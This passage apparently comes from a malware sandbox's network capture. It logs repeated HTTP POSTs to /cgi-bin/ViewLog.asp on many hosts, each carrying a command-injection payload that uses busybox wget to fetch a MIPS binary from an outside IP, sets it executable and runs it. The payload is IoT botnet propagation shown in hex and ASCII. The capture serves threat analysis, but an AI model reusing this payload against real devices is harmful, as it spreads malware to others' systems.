                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.548796892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724062920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.586504936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              283192.168.2.143995831.222.233.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.370012045 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              284192.168.2.144173631.40.224.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.370085001 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.493374109 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.710123062 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:47:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              285192.168.2.143512894.110.167.1568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.573654890 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              286192.168.2.145593694.122.74.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.604398012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              287192.168.2.144696462.29.102.678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.796403885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              288192.168.2.145144094.122.63.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.826812983 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              289192.168.2.144378294.66.231.748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.827539921 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              290192.168.2.144798494.120.148.2378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.831737995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              291192.168.2.143599894.121.181.2558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.833175898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              292192.168.2.144931694.120.14.1088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.835912943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              293192.168.2.145925294.206.40.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.878360987 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              294192.168.2.144997862.234.14.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:30.907491922 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:31.242487907 CET487INHTTP/1.1 200
                                              Vary: Origin
                                              Vary: Access-Control-Request-Method
                                              Vary: Access-Control-Request-Headers
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Content-Type: application/json;charset=utf-8
                                              Content-Length: 98
                                              Date: Thu, 23 Nov 2023 04:16:31 GMT
                                              Keep-Alive: timeout=60
                                              Connection: keep-alive
                                              Data Raw: 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d
                                              Data Ascii: {"msg":"/cgi-bin/ViewLog.asp","code":401}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              295192.168.2.145474885.118.98.1808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:31.052419901 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              296192.168.2.143643431.136.67.2288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:31.363279104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.565256119 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
